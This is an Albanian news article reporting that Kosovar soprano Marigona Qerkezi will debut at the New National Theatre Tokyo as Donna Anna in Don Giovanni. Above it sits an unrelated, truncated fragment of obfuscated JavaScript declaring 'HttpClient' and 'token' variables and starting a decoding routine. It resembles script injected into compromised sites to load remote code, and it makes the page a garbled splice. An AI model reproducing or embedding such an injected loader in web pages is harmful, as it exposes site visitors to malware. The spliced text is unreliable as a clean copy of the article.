;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kjo është kosovarja e parë që do performojë në Operën e Tokyos

By

Ka shkelur shumë skena anë e mbanë botës, por ajo po vazhdon të marrë role të mëdha dhe të prek skena shumë të njohura botërore. Fituese e shumë çmimeve e garuese në çmimet më të njohur botërore si ai “Operalia” dhe një interpretuese e shkëlqyer, është kjo sopranoja e njohur kosovare Marigona Qerkezi e cila më zërin e saj të fuqishëm dhe paraqitjet dinjitoze është duke mahnitur botën.

Kësaj radhe ajo do të ketë një debutim të dyfishtë në Tokyo – Japoni, shkruan KultPlus.

Kjo do jetë hera e parë që Marigona do performojë në New National Theater Tokyo – Teatrin kryesor të operës atje, dhe gjithashtu kësaj radhe ajo do shënojë edhe debutimin në rolin e Donna Annas nga opera Don Giovanni e Mozartit.

Ky fakt e bën shumë të lumtur artisten e cila është krenare që po arrin që përmes artit të saj të bëjë një përfaqësim dinjitoz për shtetin e saj, Kosovën.

“Kam kënaqësinë që të fus Kosovën në listën e interpretuesve në këtë teatër, duke qenë kosovarja e parë që performon edhe në Operën e Tokyos. Ende e kam të freskët gëzimin tim të papërshkrueshëm tre vite më parë kur edhe e fitova audicionin në mes të shumë solistëve nga e mbarë bota”, ka treguar Qerkezi emocionet e saj për KultPlus.

Në Tokyo do të jepen gjithsej pesë shfaqje, e në të gjitha këto shfaqje sopranoja kosovare do të performojë në rolin e Donna Anna-s. Madje Qerkezi ka treguar për KultPlus se për njërën nga këto shfaqje janë shitur të gjitha biletat.

Qerkezi së fundi ka vizituar edhe Kosovën, po ajo nuk mungon në vendin e saj edhe kur është fjala për koncerte e pjesëmarrje në festivale të ndryshme ku pritja e publikut për të është gjithmonë e mrekullueshme.

Artikuj të ngjashëm